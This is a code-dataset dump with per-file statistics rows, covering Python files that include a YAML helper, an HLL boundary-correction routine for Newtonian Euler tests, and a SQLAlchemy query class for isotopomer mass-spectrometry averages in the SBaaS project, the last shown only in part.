| 45.420849 | 79 | 0.378103 | 990 | 11,764 | 4.365657 | 0.137374 | 0.128413 | 0.038871 | 0.068024 | 0.801712 | 0.783202 | 0.783202 | 0.783202 | 0.783202 | 0.783202 | 0 | 0.085841 | 0.483084 | 11,764 | 258 | 80 | 45.596899 | 0.624897 | 0.010881 | 0 | 0.742616 | 0 | 0 | 0.052025 | 0 | 0 | 0 | 0 | 0 | 0.07173 | 1 | 0.037975 | false | 0 | 0.016878 | 0 | 0.063291 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4b9e72dde9ba2903f63645f45b7462a52f0fba94 | 108 | py | Python | utils/_yaml.py | kollad/turbo-ninja | 9c3f66b2af64aec01f522d19b309cfdd723e67cf | [
"MIT"
] | null | null | null | utils/_yaml.py | kollad/turbo-ninja | 9c3f66b2af64aec01f522d19b309cfdd723e67cf | [
"MIT"
] | 1 | 2017-12-14T05:35:38.000Z | 2017-12-14T05:35:38.000Z | utils/_yaml.py | kollad/turbo-ninja | 9c3f66b2af64aec01f522d19b309cfdd723e67cf | [
"MIT"
] | null | null | null | import yaml
def dumps(data):
return yaml.safe_dump(data)
def loads(data):
return yaml.load(data) | 12 | 31 | 0.694444 | 17 | 108 | 4.352941 | 0.588235 | 0.27027 | 0.378378 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194444 | 108 | 9 | 32 | 12 | 0.850575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
4b104591a2ceee1fddad1c3b1d7a9f73c0483936 | 41 | py | Python | src/py_tr/__init__.py | deye/pytr | 72e42fee2c6315ecb783f7f4e7d0a252d672084c | [
"MIT"
] | 8 | 2020-09-21T09:37:19.000Z | 2021-05-26T11:10:48.000Z | src/py_tr/__init__.py | omni-vi/pytr | 72e42fee2c6315ecb783f7f4e7d0a252d672084c | [
"MIT"
] | null | null | null | src/py_tr/__init__.py | omni-vi/pytr | 72e42fee2c6315ecb783f7f4e7d0a252d672084c | [
"MIT"
] | 13 | 2020-05-26T20:01:30.000Z | 2021-01-20T13:57:56.000Z | from py_tr.py_tr import TradeRepublicApi
| 20.5 | 40 | 0.878049 | 7 | 41 | 4.857143 | 0.714286 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 41 | 1 | 41 | 41 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4b106705a857be096ac9be99b25cacf96ee53fda | 9,165 | py | Python | tests/Unit/Evolution/Systems/NewtonianEuler/BoundaryCorrections/Hll.py | nilsvu/spectre | 1455b9a8d7e92db8ad600c66f54795c29c3052ee | [
"MIT"
] | 117 | 2017-04-08T22:52:48.000Z | 2022-03-25T07:23:36.000Z | tests/Unit/Evolution/Systems/NewtonianEuler/BoundaryCorrections/Hll.py | GitHimanshuc/spectre | 4de4033ba36547113293fe4dbdd77591485a4aee | [
"MIT"
] | 3,177 | 2017-04-07T21:10:18.000Z | 2022-03-31T23:55:59.000Z | tests/Unit/Evolution/Systems/NewtonianEuler/BoundaryCorrections/Hll.py | geoffrey4444/spectre | 9350d61830b360e2d5b273fdd176dcc841dbefb0 | [
"MIT"
] | 85 | 2017-04-07T19:36:13.000Z | 2022-03-01T10:21:00.000Z | # Distributed under the MIT License.
# See LICENSE.txt for details.
import numpy as np
def dg_package_data_mass_density(
mass_density, momentum_density, energy_density, flux_mass_density,
flux_momentum_density, flux_energy_density, velocity,
specific_internal_energy, normal_covector, mesh_velocity,
normal_dot_mesh_velocity, use_polytropic_fluid):
return mass_density
def dg_package_data_momentum_density(
mass_density, momentum_density, energy_density, flux_mass_density,
flux_momentum_density, flux_energy_density, velocity,
specific_internal_energy, normal_covector, mesh_velocity,
normal_dot_mesh_velocity, use_polytropic_fluid):
return momentum_density
def dg_package_data_energy_density(
mass_density, momentum_density, energy_density, flux_mass_density,
flux_momentum_density, flux_energy_density, velocity,
specific_internal_energy, normal_covector, mesh_velocity,
normal_dot_mesh_velocity, use_polytropic_fluid):
return energy_density
def dg_package_data_normal_dot_flux_mass_density(
mass_density, momentum_density, energy_density, flux_mass_density,
flux_momentum_density, flux_energy_density, velocity,
specific_internal_energy, normal_covector, mesh_velocity,
normal_dot_mesh_velocity, use_polytropic_fluid):
return np.einsum("i,i", normal_covector, flux_mass_density)
def dg_package_data_normal_dot_flux_momentum_density(
mass_density, momentum_density, energy_density, flux_mass_density,
flux_momentum_density, flux_energy_density, velocity,
specific_internal_energy, normal_covector, mesh_velocity,
normal_dot_mesh_velocity, use_polytropic_fluid):
return np.einsum("i,ij->j", normal_covector, flux_momentum_density)
def dg_package_data_normal_dot_flux_energy_density(
mass_density, momentum_density, energy_density, flux_mass_density,
flux_momentum_density, flux_energy_density, velocity,
specific_internal_energy, normal_covector, mesh_velocity,
normal_dot_mesh_velocity, use_polytropic_fluid):
return np.einsum("i,i", normal_covector, flux_energy_density)
def dg_package_data_largest_outgoing_char_speed(
mass_density, momentum_density, energy_density, flux_mass_density,
flux_momentum_density, flux_energy_density, velocity,
specific_internal_energy, normal_covector, mesh_velocity,
normal_dot_mesh_velocity, use_polytropic_fluid):
velocity_dot_normal = np.einsum("i,i", normal_covector, velocity)
if use_polytropic_fluid:
polytropic_constant = 1.0e-3
polytropic_exponent = 2.0
sound_speed = np.sqrt(polytropic_constant * polytropic_exponent *
pow(mass_density, polytropic_exponent - 1.0))
else:
adiabatic_index = 1.3
chi = specific_internal_energy * (adiabatic_index - 1.0)
kappa_times_p_over_rho_squared = ((adiabatic_index - 1.0)**2 *
specific_internal_energy)
sound_speed = np.sqrt(chi + kappa_times_p_over_rho_squared)
if normal_dot_mesh_velocity is None:
return velocity_dot_normal + sound_speed
else:
return velocity_dot_normal + sound_speed - normal_dot_mesh_velocity
def dg_package_data_largest_ingoing_char_speed(
mass_density, momentum_density, energy_density, flux_mass_density,
flux_momentum_density, flux_energy_density, velocity,
specific_internal_energy, normal_covector, mesh_velocity,
normal_dot_mesh_velocity, use_polytropic_fluid):
velocity_dot_normal = np.einsum("i,i", normal_covector, velocity)
if use_polytropic_fluid:
polytropic_constant = 1.0e-3
polytropic_exponent = 2.0
sound_speed = np.sqrt(polytropic_constant * polytropic_exponent *
pow(mass_density, polytropic_exponent - 1.0))
else:
adiabatic_index = 1.3
chi = specific_internal_energy * (adiabatic_index - 1.0)
kappa_times_p_over_rho_squared = ((adiabatic_index - 1.0)**2 *
specific_internal_energy)
sound_speed = np.sqrt(chi + kappa_times_p_over_rho_squared)
if normal_dot_mesh_velocity is None:
return velocity_dot_normal - sound_speed
else:
return velocity_dot_normal - sound_speed - normal_dot_mesh_velocity
def dg_boundary_terms_mass_density(
interior_mass_density, interior_momentum_density, interior_energy_density,
interior_normal_dot_flux_mass_density,
interior_normal_dot_flux_momentum_density,
interior_normal_dot_flux_energy_density,
interior_largest_outgoing_char_speed, interior_largest_ingoing_char_speed,
exterior_mass_density, exterior_momentum_density, exterior_energy_density,
exterior_normal_dot_flux_mass_density,
exterior_normal_dot_flux_momentum_density,
exterior_normal_dot_flux_energy_density,
exterior_largest_outgoing_char_speed, exterior_largest_ingoing_char_speed,
use_strong_form):
lambda_max = np.maximum(
0.,
np.maximum(interior_largest_outgoing_char_speed,
-exterior_largest_ingoing_char_speed))
lambda_min = np.minimum(
0.,
np.minimum(interior_largest_ingoing_char_speed,
-exterior_largest_outgoing_char_speed))
if use_strong_form:
return (lambda_min * (interior_normal_dot_flux_mass_density +
exterior_normal_dot_flux_mass_density) +
lambda_max * lambda_min *
(exterior_mass_density - interior_mass_density)) / (
lambda_max - lambda_min)
else:
return (
(lambda_max * interior_normal_dot_flux_mass_density + lambda_min *
exterior_normal_dot_flux_mass_density) + lambda_max * lambda_min *
(exterior_mass_density - interior_mass_density)) / (lambda_max -
lambda_min)
def dg_boundary_terms_momentum_density(
interior_mass_density, interior_momentum_density, interior_energy_density,
interior_normal_dot_flux_mass_density,
interior_normal_dot_flux_momentum_density,
interior_normal_dot_flux_energy_density,
interior_largest_outgoing_char_speed, interior_largest_ingoing_char_speed,
exterior_mass_density, exterior_momentum_density, exterior_energy_density,
exterior_normal_dot_flux_mass_density,
exterior_normal_dot_flux_momentum_density,
exterior_normal_dot_flux_energy_density,
exterior_largest_outgoing_char_speed, exterior_largest_ingoing_char_speed,
use_strong_form):
lambda_max = np.maximum(
0.,
np.maximum(interior_largest_outgoing_char_speed,
-exterior_largest_ingoing_char_speed))
lambda_min = np.minimum(
0.,
np.minimum(interior_largest_ingoing_char_speed,
-exterior_largest_outgoing_char_speed))
if use_strong_form:
return (lambda_min * (interior_normal_dot_flux_momentum_density +
exterior_normal_dot_flux_momentum_density) +
lambda_max * lambda_min *
(exterior_momentum_density - interior_momentum_density)) / (
lambda_max - lambda_min)
else:
return ((lambda_max * interior_normal_dot_flux_momentum_density +
lambda_min * exterior_normal_dot_flux_momentum_density) +
lambda_max * lambda_min *
(exterior_momentum_density - interior_momentum_density)) / (
lambda_max - lambda_min)
def dg_boundary_terms_energy_density(
interior_mass_density, interior_momentum_density, interior_energy_density,
interior_normal_dot_flux_mass_density,
interior_normal_dot_flux_momentum_density,
interior_normal_dot_flux_energy_density,
interior_largest_outgoing_char_speed, interior_largest_ingoing_char_speed,
exterior_mass_density, exterior_momentum_density, exterior_energy_density,
exterior_normal_dot_flux_mass_density,
exterior_normal_dot_flux_momentum_density,
exterior_normal_dot_flux_energy_density,
exterior_largest_outgoing_char_speed, exterior_largest_ingoing_char_speed,
use_strong_form):
lambda_max = np.maximum(
0.,
np.maximum(interior_largest_outgoing_char_speed,
-exterior_largest_ingoing_char_speed))
lambda_min = np.minimum(
0.,
np.minimum(interior_largest_ingoing_char_speed,
-exterior_largest_outgoing_char_speed))
if use_strong_form:
return (lambda_min * (interior_normal_dot_flux_energy_density +
exterior_normal_dot_flux_energy_density) +
lambda_max * lambda_min *
(exterior_energy_density - interior_energy_density)) / (
lambda_max - lambda_min)
else:
return ((lambda_max * interior_normal_dot_flux_energy_density +
lambda_min * exterior_normal_dot_flux_energy_density) +
lambda_max * lambda_min *
(exterior_energy_density - interior_energy_density)) / (
lambda_max - lambda_min)
| 43.851675 | 79 | 0.737698 | 1,101 | 9,165 | 5.546776 | 0.069028 | 0.066317 | 0.070247 | 0.05158 | 0.976093 | 0.971344 | 0.950221 | 0.941215 | 0.92353 | 0.913378 | 0 | 0.004695 | 0.20982 | 9,165 | 208 | 80 | 44.0625 | 0.838581 | 0.006874 | 0 | 0.782857 | 0 | 0 | 0.002088 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.062857 | false | 0 | 0.005714 | 0.034286 | 0.16 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4b274ae757de9ff1093863219bd5f0b0cbbd3c63 | 65,955 | py | Python | SBaaS_isotopomer/stage01_isotopomer_averages_query.py | dmccloskey/SBaaS_isotopomer | b669abd6e41034739a2c53d855005753e658c436 | [
"MIT"
] | null | null | null | SBaaS_isotopomer/stage01_isotopomer_averages_query.py | dmccloskey/SBaaS_isotopomer | b669abd6e41034739a2c53d855005753e658c436 | [
"MIT"
] | null | null | null | SBaaS_isotopomer/stage01_isotopomer_averages_query.py | dmccloskey/SBaaS_isotopomer | b669abd6e41034739a2c53d855005753e658c436 | [
"MIT"
] | null | null | null | #LIMS
from SBaaS_LIMS.lims_msMethod_postgresql_models import *
#SBaaS
from .stage01_isotopomer_averages_postgresql_models import *
from SBaaS_base.sbaas_base_query_update import sbaas_base_query_update
from SBaaS_base.sbaas_base_query_drop import sbaas_base_query_drop
from SBaaS_base.sbaas_base_query_initialize import sbaas_base_query_initialize
from SBaaS_base.sbaas_base_query_insert import sbaas_base_query_insert
from SBaaS_base.sbaas_base_query_select import sbaas_base_query_select
from SBaaS_base.sbaas_base_query_delete import sbaas_base_query_delete
from SBaaS_base.sbaas_template_query import sbaas_template_query
class stage01_isotopomer_averages_query(sbaas_template_query):
def initialize_supportedTables(self):
'''Set the supported tables dict for
'''
tables_supported = {'data_stage01_isotopomer_averages':data_stage01_isotopomer_averages,
'data_stage01_isotopomer_averagesNormSum':data_stage01_isotopomer_averagesNormSum,
};
self.set_supportedTables(tables_supported);
def initialize_dataStage01_isotopomer_averages(self):
try:
data_stage01_isotopomer_averages.__table__.create(self.engine,True);
data_stage01_isotopomer_averagesNormSum.__table__.create(self.engine,True);
except SQLAlchemyError as e:
print(e);
def drop_dataStage01_isotopomer_averages(self):
try:
data_stage01_isotopomer_averages.__table__.drop(self.engine,True);
data_stage01_isotopomer_averagesNormSum.__table__.drop(self.engine,True);
except SQLAlchemyError as e:
print(e);
def reset_dataStage01_isotopomer_averages(self,experiment_id_I,sample_name_abbreviations_I=[],scan_types_I=[]):
try:
if experiment_id_I and sample_name_abbreviations_I and scan_types_I:
for sna in sample_name_abbreviations_I:
for st in scan_types_I:
reset = self.session.query(data_stage01_isotopomer_averages).filter(
data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averages.sample_name_abbreviation.like(sna),
data_stage01_isotopomer_averages.scan_type.like(st)).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_averagesNormSum).filter(
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sna),
data_stage01_isotopomer_averagesNormSum.scan_type.like(st)).delete(synchronize_session=False);
self.session.commit();
if experiment_id_I and sample_name_abbreviations_I:
for sna in sample_name_abbreviations_I:
reset = self.session.query(data_stage01_isotopomer_averages).filter(
data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averages.sample_name_abbreviation.like(sna)).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_averagesNormSum).filter(
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sna)).delete(synchronize_session=False);
self.session.commit();
elif experiment_id_I:
reset = self.session.query(data_stage01_isotopomer_averages).filter(data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_averagesNormSum).filter(data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
self.session.commit();
except SQLAlchemyError as e:
print(e);
## Query data from data_stage01_isotopomer_averages:
# query normalized intensity from data_stage01_isotopomer_averages
def get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndMetIDAndFragmentFormulaAndMassAndScanType_dataStage01Averages(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,met_id_I,fragment_formula_I,fragment_mass_I,scan_type_I):
'''Querry peak data for a specific experiment_id, sample_name, met_id, and scan type'''
try:
data = self.session.query(data_stage01_isotopomer_averages.intensity_normalized_average,
data_stage01_isotopomer_averages.intensity_normalized_cv,
data_stage01_isotopomer_averages.intensity_normalized_units).filter(
data_stage01_isotopomer_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averages.time_point.like(time_point_I),
data_stage01_isotopomer_averages.fragment_formula.like(fragment_formula_I),
data_stage01_isotopomer_averages.fragment_mass == fragment_mass_I,
data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averages.met_id.like(met_id_I),
data_stage01_isotopomer_averages.scan_type.like(scan_type_I),
data_stage01_isotopomer_averages.used_).all();
intensity_normalized_average_O = None;
intensity_normalized_cv_O = None;
intensity_normalized_units_O = None;
if not data:
print('No normalized intensities found for the following:')
print('sample_name_abbreviation\ttime_point\tmet_id\tfragment_formula\tfragment_mass\tscan_type');
print((sample_name_abbreviation_I) + '\t' + str(time_point_I) + '\t' + str(met_id_I) + '\t' + str(fragment_formula_I) + '\t' + str(fragment_mass_I) + '\t' + str(scan_type_I));
return intensity_normalized_average_O,intensity_normalized_cv_O;
else:
intensity_normalized_average_O = data[0][0];
intensity_normalized_cv_O = data[0][1];
intensity_normalized_units_O = data[0][2];
return intensity_normalized_average_O,intensity_normalized_cv_O;
except SQLAlchemyError as e:
print(e);
# query time points from data_stage01_isotopomer_averages:
def get_timePoint_experimentID_dataStage01Averages(self,experiment_id_I):
'''Querry time points that are used from the experiment and sample name'''
try:
time_points = self.session.query(data_stage01_isotopomer_averages.time_point).filter(
data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averages.used_.is_(True)).group_by(
data_stage01_isotopomer_averages.time_point).order_by(
data_stage01_isotopomer_averages.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
# query sample name abbreviations from data_stage01_isotopomer_averages:
def get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01Averages(self,experiment_id_I,sample_type_I,time_point_I):
'''Querry sample name abbreviations that are used from
the experiment for specific time-points'''
try:
sample_name_abbreviations = self.session.query(
data_stage01_isotopomer_averages.sample_name_abbreviation).filter(
data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averages.used_.is_(True),
data_stage01_isotopomer_averages.sample_type.like(sample_type_I),
data_stage01_isotopomer_averages.time_point.like(time_point_I)).group_by(
data_stage01_isotopomer_averages.sample_name_abbreviation).order_by(
data_stage01_isotopomer_averages.sample_name_abbreviation).all();
sample_name_abbreviations_O = [];
for sn in sample_name_abbreviations:
sample_name_abbreviations_O.append(sn[0]);
return sample_name_abbreviations_O;
except SQLAlchemyError as e:
print(e);
# query scan types from data_stage01_isotopomer_averages
def get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Averages(self,experiment_id_I,time_point_I,sample_name_abbreviations_I,sample_type_I):
'''Querry scan types that are used from the experiment for specific time-points and sample name abbreviations'''
try:
scan_types = self.session.query(
data_stage01_isotopomer_averages.scan_type).filter(
data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averages.used_.is_(True),
data_stage01_isotopomer_averages.time_point.like(time_point_I),
data_stage01_isotopomer_averages.sample_type.like(sample_type_I),
data_stage01_isotopomer_averages.sample_name_abbreviation.like(sample_name_abbreviations_I)).group_by(
data_stage01_isotopomer_averages.scan_type).order_by(
data_stage01_isotopomer_averages.scan_type).all();
scan_types_O = [];
for st in scan_types:
scan_types_O.append(st[0]);
return scan_types_O;
except SQLAlchemyError as e:
print(e);
# query met_ids from data_stage01_isotopomer_averages
def get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01Averages(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I):
'''Querry met ids that are used for the experiment, sample abbreviation, time point, scan type'''
try:
met_ids = self.session.query(data_stage01_isotopomer_averages.met_id).filter(
data_stage01_isotopomer_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averages.time_point.like(time_point_I),
data_stage01_isotopomer_averages.sample_type.like(sample_type_I),
data_stage01_isotopomer_averages.scan_type.like(scan_type_I),
data_stage01_isotopomer_averages.used_.is_(True)).group_by(
data_stage01_isotopomer_averages.met_id).order_by(
data_stage01_isotopomer_averages.met_id.asc()).all();
met_ids_O = [];
if not(met_ids):
print("no results found")
print("experiment_id_I sample_name_abbreviation_I time_point_I scan_type_I");
print(experiment_id_I,sample_name_abbreviation_I,time_point_I,scan_type_I);
else:
for cn in met_ids:
met_ids_O.append(cn[0]);
return met_ids_O;
except SQLAlchemyError as e:
print(e);
# query normalized intensity from data_stage01_isotopomer_averages
def get_dataProductFragment_experimentIDAndTimePointSampleAbbreviationAndSampleTypeAndScanTypeAndMetID_dataStage01Averages(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I, met_id_I):
'''Querry peak data for a specific experiment_id, sample_name_abbreviation'''
try:
data = self.session.query(data_stage01_isotopomer_averages.fragment_formula,
data_stage01_isotopomer_averages.fragment_mass,
MS_components.product_fragment,
data_stage01_isotopomer_averages.intensity_normalized_average,
data_stage01_isotopomer_averages.intensity_normalized_cv,
data_stage01_isotopomer_averages.intensity_theoretical,
data_stage01_isotopomer_averages.abs_devFromTheoretical,
data_stage01_isotopomer_spectrumAccuracy.spectrum_accuracy,
data_stage01_isotopomer_averages.scan_type).filter(
data_stage01_isotopomer_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averages.time_point.like(time_point_I),
data_stage01_isotopomer_averages.sample_type.like(sample_type_I),
data_stage01_isotopomer_averages.scan_type.like(scan_type_I),
data_stage01_isotopomer_averages.met_id.like(met_id_I),
data_stage01_isotopomer_averages.fragment_formula.like(MS_components.product_formula),
data_stage01_isotopomer_averages.met_id.like(MS_components.met_id),
MS_components.ms_methodtype.like('tuning'),
data_stage01_isotopomer_averages.used_,
data_stage01_isotopomer_spectrumAccuracy.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_spectrumAccuracy.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_spectrumAccuracy.time_point.like(time_point_I),
data_stage01_isotopomer_spectrumAccuracy.sample_type.like(sample_type_I),
data_stage01_isotopomer_spectrumAccuracy.scan_type.like(scan_type_I),
data_stage01_isotopomer_spectrumAccuracy.met_id.like(met_id_I),
data_stage01_isotopomer_spectrumAccuracy.used_.is_(True),
data_stage01_isotopomer_spectrumAccuracy.fragment_formula.like(MS_components.product_formula),
data_stage01_isotopomer_spectrumAccuracy.met_id.like(MS_components.met_id)).group_by(
data_stage01_isotopomer_averages.fragment_formula,
data_stage01_isotopomer_averages.fragment_mass,
MS_components.product_fragment,
data_stage01_isotopomer_averages.intensity_normalized_average,
data_stage01_isotopomer_averages.intensity_normalized_cv,
data_stage01_isotopomer_averages.intensity_theoretical,
data_stage01_isotopomer_averages.abs_devFromTheoretical,
data_stage01_isotopomer_spectrumAccuracy.spectrum_accuracy,
data_stage01_isotopomer_averages.scan_type).order_by(
data_stage01_isotopomer_averages.fragment_formula.desc(),
data_stage01_isotopomer_averages.fragment_mass.asc()).all();
data_O = [];
if not data:
print('No normalized intensities found for the following:')
print('sample_name_abbreviation: ' + sample_name_abbreviation_I);
return data_O;
else:
# algorithm will break there is no data for a0 mass and there are jumps in the a values (i.e. a0 to a2);
fragment_formula = '';
fragment_formula_old = '';
data_cnt = len(data)-1;
i = 0;
while i <= data_cnt:
fragment_formula_old = data[i].fragment_formula;
row_key = [];
row_theoretical = [];
row_measured = [];
row_measured_cv = [];
row_measured_dif = [];
row_spectrum_accuracy = [];
row = [];
for a in range(50):
if i <= data_cnt:
fragment_formula = data[i].fragment_formula;
if fragment_formula == fragment_formula_old:
if a == 0:
# add key columns
row_key.append(sample_name_abbreviation_I);
row_key.append(time_point_I);
row_key.append(met_id_I);
row_key.append(data[i].fragment_formula);
row_key.append(str(data[i].product_fragment));
row_key.append(data[i].scan_type);
row_spectrum_accuracy.append(data[i].spectrum_accuracy);
mass0 = data[i].fragment_mass
massi = data[i].fragment_mass;
massDif = massi-mass0;
# add a+0... information
if data[i].intensity_theoretical: theoretical = numpy.round(data[i].intensity_theoretical,3);
else: theoretical = data[i].intensity_theoretical;
row_theoretical.append(theoretical)
if data[i].intensity_normalized_average: measured = numpy.round(data[i].intensity_normalized_average,3);
else: measured = data[i].intensity_normalized_average;
row_measured.append(measured)
if data[i].intensity_normalized_cv: cv = numpy.round(data[i].intensity_normalized_cv,3);
else: cv = data[i].intensity_normalized_cv;
row_measured_cv.append(cv);
if data[i].abs_devFromTheoretical: dif = numpy.round(data[i].abs_devFromTheoretical,3)
else: dif = data[i].abs_devFromTheoretical;
row_measured_dif.append(dif)
i += 1;
else:
row_theoretical.append(None);
row_measured.append(None);
row_measured_cv.append(None);
row_measured_dif.append(None);
else:
row_theoretical.append(None);
row_measured.append(None);
row_measured_cv.append(None);
row_measured_dif.append(None);
row.extend(row_key);
row.extend(row_theoretical);
row.extend(row_measured);
row.extend(row_measured_cv);
row.extend(row_measured_dif);
row.extend(row_spectrum_accuracy);
data_O.append(row);
return data_O;
except SQLAlchemyError as e:
print(e);
def get_dataPrecursorFragment_experimentIDAndTimePointSampleAbbreviationAndSampleTypeAndScanTypeAndMetID_dataStage01Averages(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I, met_id_I):
'''Querry peak data for a specific experiment_id, sample_name_abbreviation'''
try:
data = self.session.query(data_stage01_isotopomer_averages.fragment_formula,
data_stage01_isotopomer_averages.fragment_mass,
MS_components.precursor_fragment,
data_stage01_isotopomer_averages.intensity_normalized_average,
data_stage01_isotopomer_averages.intensity_normalized_cv,
data_stage01_isotopomer_averages.intensity_theoretical,
data_stage01_isotopomer_averages.abs_devFromTheoretical,
data_stage01_isotopomer_spectrumAccuracy.spectrum_accuracy,
data_stage01_isotopomer_averages.scan_type).filter(
data_stage01_isotopomer_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averages.time_point.like(time_point_I),
data_stage01_isotopomer_averages.sample_type.like(sample_type_I),
data_stage01_isotopomer_averages.scan_type.like(scan_type_I),
data_stage01_isotopomer_averages.met_id.like(met_id_I),
data_stage01_isotopomer_averages.fragment_formula.like(MS_components.precursor_formula),
data_stage01_isotopomer_averages.met_id.like(MS_components.met_id),
MS_components.ms_methodtype.like('tuning'),
data_stage01_isotopomer_averages.used_,
data_stage01_isotopomer_spectrumAccuracy.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_spectrumAccuracy.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_spectrumAccuracy.time_point.like(time_point_I),
data_stage01_isotopomer_spectrumAccuracy.sample_type.like(sample_type_I),
data_stage01_isotopomer_spectrumAccuracy.scan_type.like(scan_type_I),
data_stage01_isotopomer_spectrumAccuracy.met_id.like(met_id_I),
data_stage01_isotopomer_spectrumAccuracy.used_.is_(True),
data_stage01_isotopomer_spectrumAccuracy.fragment_formula.like(MS_components.precursor_formula),
data_stage01_isotopomer_spectrumAccuracy.met_id.like(MS_components.met_id)).group_by(
data_stage01_isotopomer_averages.fragment_formula,
data_stage01_isotopomer_averages.fragment_mass,
MS_components.precursor_fragment,
data_stage01_isotopomer_averages.intensity_normalized_average,
data_stage01_isotopomer_averages.intensity_normalized_cv,
data_stage01_isotopomer_averages.intensity_theoretical,
data_stage01_isotopomer_averages.abs_devFromTheoretical,
data_stage01_isotopomer_spectrumAccuracy.spectrum_accuracy,
data_stage01_isotopomer_averages.scan_type).order_by(
data_stage01_isotopomer_averages.fragment_formula.desc(),
data_stage01_isotopomer_averages.fragment_mass.asc()).all();
data_O = [];
if not data:
print('No normalized intensities found for the following:')
print('sample_name_abbreviation: ' + sample_name_abbreviation_I);
return data_O;
else:
# algorithm will break there is no data for a0 mass and there are jumps in the a values (i.e. a0 to a2);
fragment_formula = '';
fragment_formula_old = '';
data_cnt = len(data)-1;
i = 0;
while i <= data_cnt:
fragment_formula_old = data[i].fragment_formula;
row_key = [];
row_theoretical = [];
row_measured = [];
row_measured_cv = [];
row_measured_dif = [];
row_spectrum_accuracy = [];
row = [];
for a in range(50):
if i <= data_cnt:
fragment_formula = data[i].fragment_formula;
if fragment_formula == fragment_formula_old:
if a == 0:
# add key columns
row_key.append(sample_name_abbreviation_I);
row_key.append(time_point_I);
row_key.append(met_id_I);
row_key.append(data[i].fragment_formula);
row_key.append(str(data[i].precursor_fragment));
row_key.append(data[i].scan_type);
row_spectrum_accuracy.append(data[i].spectrum_accuracy);
mass0 = data[i].fragment_mass
massi = data[i].fragment_mass;
massDif = massi-mass0;
# add a+0... information
if data[i].intensity_theoretical: theoretical = numpy.round(data[i].intensity_theoretical,3);
else: theoretical = data[i].intensity_theoretical;
row_theoretical.append(theoretical)
if data[i].intensity_normalized_average: measured = numpy.round(data[i].intensity_normalized_average,3);
else: measured = data[i].intensity_normalized_average;
row_measured.append(measured)
if data[i].intensity_normalized_cv: cv = numpy.round(data[i].intensity_normalized_cv,3);
else: cv = data[i].intensity_normalized_cv;
row_measured_cv.append(cv);
